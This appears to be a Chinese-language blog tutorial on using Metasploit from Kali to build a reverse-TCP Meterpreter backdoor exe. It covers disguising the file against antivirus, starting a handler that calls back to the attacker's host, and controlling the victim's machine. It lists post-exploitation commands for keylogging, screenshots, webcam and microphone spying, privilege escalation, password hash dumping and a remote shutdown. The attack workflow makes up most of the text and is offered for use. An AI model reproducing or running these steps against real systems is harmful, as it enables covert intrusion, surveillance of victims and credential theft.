Kali利用metasploit 生成后门程序，操作目标主机cmd

 

一.利用命令生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe

LHOST:表示本机地址

-f :表示生成程序的后缀

met：文件名  可以自定义

把生成的exe文件发送给目标主机执行，注意记得伪装下否则会被杀毒软件识别，我这里是利用打包命令将其打包，然后发送到目标主机执行。

 

二.msfconsole 命令打开控制台

 

root@kali:~# msfconsole 

设置好参数执行攻击 

msfconsole > use exploit/multi/handler
msfconsole (exploit/multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msfconsole (exploit/multi/handler) > set LHOST <IP>
msfconsole (exploit/multi/handler) > set LPORT 443
msfconsole (exploit/multi/handler) > exploit

执行攻击，等待目标主机点击文件。执行成功！ 

对方点击，攻击成功，进入shell

乱码解决：

chcp 65001

进入shell，打开计算器

输入关机命令

shotdown -s -t 60

进入meterpreter之后即可进行一些相关木马操作

首先可以查看帮助文档，命令“help”，挑常用操作来讲↓↓↓

------------------------------------------------------------------------------------------------

用户操作：Stdapi: User interface Commands（用户接口命令）

enumdesktops    -->列出所有可访问的桌面和窗口站（窗体列表）
getdesktop      -->得到当前的Meterpreter桌面

idletime        -->返回秒远程用户已经闲置数量

keyscan_start   -->开始捕获击键（开始键盘记录）
keyscan_dump    -->转储按键缓冲（下载键盘记录）
keyscan_stop    -->停止捕获击键（停止键盘记录）

PS：键盘记录注意点，先开始，后下载，再结束，否则会出错


screenshot      -->抓取交互式桌面截图（当前操作界面截图一张）
setdesktop      -->改变meterpreters当前桌面

uictl           -->控制一些用户界面组件（获取键盘、鼠标控制权）
使用uictl -h 查看帮助（打开/关闭，键盘/鼠标）


摄像头：Stdapi: Webcam Commands（摄像头命令）

record_mic       -->X秒从默认的麦克风record_mic音频记录（音频录制）


webcam_chat      -->开始视频聊天（视频，对方会有弹窗）
webcam_list      -->单摄像头（查看摄像头列表）


webcam_snap      -->采取快照从指定的摄像头（摄像头拍摄一张照片）
webcam_stream    -->播放视频流从指定的摄像头（开启摄像头监控）


其他命令操作

getsystem        -->获取高权限
 
hashdump         -->获取当前用户hash

 

后续命令持续更新.....